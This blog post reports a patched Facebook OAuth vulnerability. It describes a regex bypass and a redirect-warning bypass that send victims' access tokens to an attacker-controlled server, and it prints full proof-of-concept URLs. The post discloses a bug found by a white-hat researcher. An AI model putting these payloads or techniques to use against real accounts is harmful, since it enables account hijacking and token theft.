Facebook Hacking Accounts Using Another OAuth Vulnerability

facebook hacking

Remember the last OAuth Flaw in Facebook, that allow an attacker to hijack any account without victim’s interaction with any Facebook Application, was reported by white hat Hacker ‘Nir Goldshlager‘. After that Facebook security team fixed that issue using some minor changes.
Yesterday Goldshlager once again pwn Facebook OAuth mechanism by bypassing all those minor changes done by Facebook Team. He explains the complete Saga of hunting Facebook bug in a blog post.
As explained in last report on The hacker News, OAuth URL contains two parameters i.e. redirect_uri & next, and using Regex Protection (%23xxx!,%23/xxx,/) Facebook team tried to secure that after last patch.
In recent discovered technique hacker found that next parameter allow facebook.facebook.com domain as a valid option and multiple hash signs is now enough to bypass Regex Protection.
He use facebook.com/l.php file (used by Facebook to redirect users to external links) to redirect victims to his malicious Facebook application and then to his own server for storing token values, where tokens are the alternate access to any Facebook account without password.
warnning
But a warning message while redirecting ruin the show ! No worries, he found that 5 bytes of data in redirection URL is able to bypass this warning message.

Example:  https://www.facebook.com/l/goldy;touch.facebook.com/apps/sdfsdsdsgs (where ‘goldy’ is the 5 byte of data used).

Now at the last step, He Redirect the victim to external websites located in files.nirgoldshlager.com (attacker server) via malicious Facebook app created by him and victim’s access_token will be logged there. So here we have the final POC that can hack any Facebook account by exploiting another Facebook OAuth bug.

For all browsers:
https://www.facebook.com/connect/uiserver.php?app_id=220764691281998&next=https://facebook.facebook.com/%23/x/%23/l/ggggg%3btouch.facebook.com/apps/sdfsdsdsgs%23&display=page&fbconnect=1&method=permissions.request&response_type=token

For Firefox browser:
https://www.facebook.com/dialog/permissions.request?app_id=220764691281998&display=page&next=https%3A%2F%2Ftouch.facebook.com%2F%2523%2521%2Fapps%2Ftestestestte%2F&response_type=token&perms=email&fbconnect=1

This bug was also reported to Facebook Security Team last week by Nir Goldshlager and patched now, if you are a hacker, we expect YOU to hack it again !

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: